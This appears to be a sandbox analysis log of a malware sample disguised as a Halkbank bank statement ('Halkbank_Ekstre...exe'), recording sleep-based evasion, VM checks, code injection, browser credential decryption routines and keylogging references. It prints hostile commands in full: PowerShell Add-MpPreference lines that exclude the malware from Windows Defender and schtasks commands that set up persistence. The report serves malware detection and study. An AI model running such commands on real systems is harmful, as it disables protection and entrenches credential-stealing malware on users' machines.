Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -598578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -598468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -598358s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -598250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -598140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -598031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -597921s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -597763s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -597640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -597490s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -597312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -597187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -597075s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -596968s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -596859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -596749s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -596640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -596531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -596421s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -596312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -596203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -596093s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -595984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -595875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -595765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -595656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -595547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -595437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -595328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -595218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -595108s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -594998s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -594772s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -594625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -594500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -594390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -594281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -594172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -594062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -593953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -593843s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe TID: 1016	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 599888	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 598358	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 598250	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 597921	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 597763	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 597640	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 597490	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 597312	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 597187	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 597075	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 596968	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 596859	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 596749	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 596640	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 596421	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 596312	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 596203	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 596093	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 595984	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 595875	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 595765	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 595656	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 595547	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 595437	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 595218	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 595108	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 594998	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 594772	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 594625	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 594500	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 594390	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 594281	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 594172	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 594062	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 593953	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 593843	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: Halkbank_Ekstre_20241022_081224_563756.exe, 00000000.00000002.2163021962.0000000006F50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\74Q
Source: bAZAANr.exe, 0000000F.00000002.4552812957.0000000000A71000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlli
Source: Halkbank_Ekstre_20241022_081224_563756.exe, 00000009.00000002.4553590191.0000000000E67000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe

Code function: 9_2_027AC3A8 LdrInitializeThunk,LdrInitializeThunk,

9_2_027AC3A8

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.37d5808.1.raw.unpack, UltraSpeed.cs	Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.37d5808.1.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.37d5808.1.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe"
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bAZAANr.exe"
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bAZAANr.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Memory written: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Memory written: C:\Users\user\AppData\Roaming\bAZAANr.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bAZAANr.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bAZAANr" /XML "C:\Users\user\AppData\Local\Temp\tmpD8B4.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process created: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe "C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bAZAANr" /XML "C:\Users\user\AppData\Local\Temp\tmpF6AC.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process created: C:\Users\user\AppData\Roaming\bAZAANr.exe "C:\Users\user\AppData\Roaming\bAZAANr.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Queries volume information: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
